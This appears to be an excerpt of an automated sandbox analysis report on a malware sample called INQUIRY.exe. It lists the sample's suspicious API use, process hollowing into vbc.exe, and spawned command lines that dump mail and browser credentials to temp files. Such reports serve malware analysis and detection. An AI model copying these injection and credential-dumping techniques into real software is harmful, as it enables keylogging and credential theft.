                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\INQUIRY.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Injects a PE file into a foreign process
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Sample uses process hollowing technique
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: GetLocaleInfoA,GetACP,
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: GetLocaleInfoA,GetACP,
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: GetLocaleInfoA,GetACP,
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
